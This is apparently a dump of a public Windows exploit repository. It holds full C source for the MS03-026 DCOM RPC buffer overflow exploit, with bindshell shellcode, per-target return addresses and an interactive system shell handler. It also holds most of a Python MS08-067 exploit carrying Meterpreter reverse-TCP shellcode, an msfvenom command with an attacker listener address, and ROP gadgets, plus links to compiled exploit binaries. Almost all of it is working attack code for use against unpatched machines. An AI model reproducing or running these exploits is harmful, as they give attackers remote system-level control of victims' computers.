bytes.\n", len); 262 | 263 | len=recv(sock,buf1,1000,0); 264 | if(len<=0) 265 | { 266 | printf("[-] recv error:%d\n", GetLastError()); 267 | return; 268 | } 269 | else 270 | printf("[+] recv %d bytes.\n", len); 271 | 272 | len = send(sock,buf2,len1,0); 273 | if(len<=0) 274 | { 275 | printf("[-] Send failed.Error:%d\n",WSAGetLastError()); 276 | return; 277 | } 278 | else 279 | printf("[+] send %d bytes.\n", len); 280 | len=recv(sock,buf1,1024,0); 281 | if(len<=0) 282 | { 283 | printf("[+] Target crash or exploit success? :)\n"); 284 | } 285 | else 286 | printf("[-] recv %d bytes. Bad luck!\n", len); 287 | } 288 | 289 | 290 | 291 | // milw0rm.com [2003-09-16] 292 | -------------------------------------------------------------------------------- /MS03-026/100.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS03-026/100.exe -------------------------------------------------------------------------------- /MS03-026/66.c: -------------------------------------------------------------------------------- 1 | /* 2 | DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code 3 | 4 | Written by H D Moore 5 | 6 | - Usage: ./dcom 7 | - Targets: 8 | - 0 Windows 2000 SP0 (english) 9 | - 1 Windows 2000 SP1 (english) 10 | - 2 Windows 2000 SP2 (english) 11 | - 3 Windows 2000 SP3 (english) 12 | - 4 Windows 2000 SP4 (english) 13 | - 5 Windows XP SP0 (english) 14 | - 6 Windows XP SP1 (english) 15 | 16 | */ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | unsigned char bindstr[]={ 31 | 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 32 | 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 33 | 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 34 | 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 35 | 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 36 | 37 | unsigned char request1[]={ 38 | 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 39 | ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 40 | ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 41 | ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 42 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 43 | ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 44 | ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 45 | ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 46 | ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 47 | ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 48 | ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 49 | ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 50 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 51 | ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 52 | ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 53 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 54 | ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 55 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 56 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 57 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 58 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 59 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 60 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 61 | ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 62 | ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 63 | ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 64 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 65 | ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 66 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 67 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 68 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 69 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 70 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 71 | ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 72 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 73 | ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 74 | ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 75 | ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 76 | ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 77 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 78 | ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 79 | ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 80 | ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 81 | ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 82 | ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 83 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 84 | ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 85 | ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 86 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 87 | ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 88 | ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 89 | ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 90 | ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 91 | ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 92 | ,0x00,0x00,0x00,0x00,0x00,0x00}; 93 | 94 | unsigned char request2[]={ 95 | 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 96 | ,0x00,0x00,0x5C,0x00,0x5C,0x00}; 97 | 98 | unsigned char request3[]={ 99 | 0x5C,0x00 100 | ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 101 | ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 102 | ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 103 | ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 104 | 105 | 106 | 107 | unsigned char *targets [] = 108 | { 109 | "Windows 2000 SP0 (english)", 110 | "Windows 2000 SP1 (english)", 111 | "Windows 2000 SP2 (english)", 112 | "Windows 2000 SP3 (english)", 113 | "Windows 2000 SP4 (english)", 114 | "Windows XP SP0 (english)", 115 | "Windows XP SP1 (english)", 116 | NULL 117 | }; 118 | 119 | unsigned long offsets [] = 120 | { 121 | 0x77e81674, 122 | 0x77e829ec, 123 | 0x77e824b5, 124 | 0x77e8367a, 125 | 0x77f92a9b, 126 | 0x77e9afe3, 127 | 0x77e626ba, 128 | }; 129 | 130 | unsigned char sc[]= 131 | "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" 132 | "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" 133 | "\x46\x00\x58\x00\x46\x00\x58\x00" 134 | 135 | "\xff\xff\xff\xff" /* return address */ 136 | 137 | "\xcc\xe0\xfd\x7f" /* primary thread data block */ 138 | "\xcc\xe0\xfd\x7f" /* primary thread data block */ 139 | 140 | /* port 4444 bindshell */ 141 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 142 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 143 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 144 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 145 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 146 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 147 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 148 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 149 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 150 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 151 | "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" 152 | "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" 153 | "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" 154 | "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" 155 | "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" 156 | "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" 157 | "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" 158 | "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" 159 | "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" 160 | "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" 161 | "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" 162 | "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" 163 | "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" 164 | "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" 165 | "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" 166 | "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" 167 | "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" 168 | "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" 169 | "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" 170 | "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" 171 | "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" 172 | "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" 173 | "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" 174 | "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" 175 | "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" 176 | "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" 177 | "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" 178 | "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" 179 | "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" 180 | "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" 181 | "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" 182 | "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; 183 | 184 | 185 | 186 | unsigned char request4[]={ 187 | 0x01,0x10 188 | ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 189 | ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 190 | ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 191 | }; 192 | 193 | 194 | /* ripped from TESO code */ 195 | void shell (int sock) 196 | { 197 | int l; 198 | char buf[512]; 199 | fd_set rfds; 200 | 201 | 202 | while (1) { 203 | FD_SET (0, &rfds); 204 | FD_SET (sock, &rfds); 205 | 206 | select (sock + 1, &rfds, NULL, NULL, NULL); 207 | if (FD_ISSET (0, &rfds)) { 208 | l = read (0, buf, sizeof (buf)); 209 | if (l <= 0) { 210 | printf("\n - Connection closed by local user\n"); 211 | exit (EXIT_FAILURE); 212 | } 213 | write (sock, buf, l); 214 | } 215 | 216 | if (FD_ISSET (sock, &rfds)) { 217 | l = read (sock, buf, sizeof (buf)); 218 | if (l == 0) { 219 | printf ("\n - Connection closed by remote host.\n"); 220 | exit (EXIT_FAILURE); 221 | } else if (l < 0) { 222 | printf ("\n - Read failure\n"); 223 | exit (EXIT_FAILURE); 224 | } 225 | write (1, buf, l); 226 | } 227 | } 228 | } 229 | 230 | 231 | int main(int argc, char **argv) 232 | { 233 | 234 | int sock; 235 | int len,len1; 236 | unsigned int target_id; 237 | unsigned long ret; 238 | struct sockaddr_in target_ip; 239 | unsigned short port = 135; 240 | unsigned char buf1[0x1000]; 241 | unsigned char buf2[0x1000]; 242 | 243 | printf("---------------------------------------------------------\n"); 244 | printf("- Remote DCOM RPC Buffer Overflow Exploit\n"); 245 | printf("- Original code by FlashSky and Benjurry\n"); 246 | printf("- Rewritten by HDM \n"); 247 | 248 | 249 | if(argc<3) 250 | { 251 | printf("- Usage: %s \n", argv[0]); 252 | printf("- Targets:\n"); 253 | for (len=0; targets[len] != NULL; len++) 254 | { 255 | printf("- %d\t%s\n", len, targets[len]); 256 | } 257 | printf("\n"); 258 | exit(1); 259 | } 260 | 261 | /* yeah, get over it :) */ 262 | target_id = atoi(argv[1]); 263 | ret = offsets[target_id]; 264 | 265 | printf("- Using return address of 0x%.8x\n", ret); 266 | 267 | memcpy(sc+36, (unsigned char *) &ret, 4); 268 | 269 | target_ip.sin_family = AF_INET; 270 | target_ip.sin_addr.s_addr = inet_addr(argv[2]); 271 | target_ip.sin_port = htons(port); 272 | 273 | if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) 274 | { 275 | perror("- Socket"); 276 | return(0); 277 | } 278 | 279 | if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) 280 | { 281 | perror("- Connect"); 282 | return(0); 283 | } 284 | 285 | len=sizeof(sc); 286 | memcpy(buf2,request1,sizeof(request1)); 287 | len1=sizeof(request1); 288 | 289 | *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; 290 | *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; 291 | 292 | memcpy(buf2+len1,request2,sizeof(request2)); 293 | len1=len1+sizeof(request2); 294 | memcpy(buf2+len1,sc,sizeof(sc)); 295 | len1=len1+sizeof(sc); 296 | memcpy(buf2+len1,request3,sizeof(request3)); 297 | len1=len1+sizeof(request3); 298 | memcpy(buf2+len1,request4,sizeof(request4)); 299 | len1=len1+sizeof(request4); 300 | 301 | *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; 302 | 303 | 304 | *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; 305 | *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; 306 | *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; 307 | *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; 308 | *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; 309 | *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; 310 | *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; 311 | 312 | if (send(sock,bindstr,sizeof(bindstr),0)== -1) 313 | { 314 | perror("- Send"); 315 | return(0); 316 | } 317 | len=recv(sock, buf1, 1000, 0); 318 | 319 | if (send(sock,buf2,len1,0)== -1) 320 | { 321 | perror("- Send"); 322 | return(0); 323 | } 324 | close(sock); 325 | sleep(1); 326 | 327 | target_ip.sin_family = AF_INET; 328 | target_ip.sin_addr.s_addr = inet_addr(argv[2]); 329 | target_ip.sin_port = htons(4444); 330 | 331 | if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) 332 | { 333 | perror("- Socket"); 334 | return(0); 335 | } 336 | 337 | if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) 338 | { 339 | printf("- Exploit appeared to have failed.\n"); 340 | return(0); 341 | } 342 | 343 | printf("- Dropping to System Shell...\n\n"); 344 | 345 | shell(sock); 346 | 347 | return(0); 348 | } 349 | 350 | // milw0rm.com [2003-07-26] 351 | -------------------------------------------------------------------------------- /MS03-026/66.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS03-026/66.out -------------------------------------------------------------------------------- /MS05-039 - PnP Service/MS05-039.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS05-039 - PnP Service/MS05-039.exe -------------------------------------------------------------------------------- /MS08-025 - win32k.sys/5518.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-025 - win32k.sys/5518.zip -------------------------------------------------------------------------------- /MS08-025 - win32k.sys/MS08-025.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS08-025 - win32k.sys/MS08-025.exe -------------------------------------------------------------------------------- /MS08-067/40279.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import time 3 | import sys 4 | 5 | 6 | from threading import Thread #Thread is imported incase you would like to modify 7 | 8 | 9 | try: 10 | 11 | from impacket import smb 12 | 13 | from impacket import uuid 14 | 15 | from impacket import dcerpc 16 | 17 | from impacket.dcerpc.v5 import transport 18 | 19 | 20 | except ImportError, _: 21 | 22 | print 'Install the following library to make this script work' 23 | 24 | print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' 25 | 26 | print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' 27 | 28 | sys.exit(1) 29 | 30 | 31 | print '#######################################################################' 32 | 33 | print '# MS08-067 Exploit' 34 | 35 | print '# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).' 36 | 37 | print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi' 38 | 39 | print '#######################################################################\n' 40 | 41 | 42 | #Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40; 43 | #Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included) 44 | #EXITFUNC=thread Important! 45 | #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python 46 | shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 47 | shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 48 | shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 49 | shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81" 50 | shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35" 51 | shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae" 52 | shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6" 53 | shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6" 54 | shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91" 55 | shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15" 56 | shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c" 57 | shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c" 58 | shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1" 59 | shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda" 60 | shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba" 61 | shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4" 62 | shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc" 63 | shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b" 64 | shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69" 65 | shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68" 66 | shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc" 67 | shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff" 68 | shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28" 69 | shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf" 70 | shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22" 71 | shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1" 72 | shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0" 73 | shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2" 74 | shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22" 75 | shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4" 76 | shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60" 77 | shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48" 78 | shellcode += "\x08\x9e\xe0" 79 | 80 | nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10 81 | disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62" 82 | ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01"; 83 | module_base = 0x6f880000 84 | def generate_rop(rvas): 85 | gadget1="\x90\x5a\x59\xc3" 86 | gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] 87 | gadget3="\xcc\x90\xeb\x5a" 88 | ret=struct.pack('\n' % sys.argv[0] 203 | 204 | print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n' 205 | print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n' 206 | 207 | sys.exit(-1) 208 | 209 | 210 | 211 | current = SRVSVC_Exploit(target, os) 212 | 213 | current.start() 214 | -------------------------------------------------------------------------------- /MS08-067/MS08-067.exe: -------------------------------------------------------------------------------- 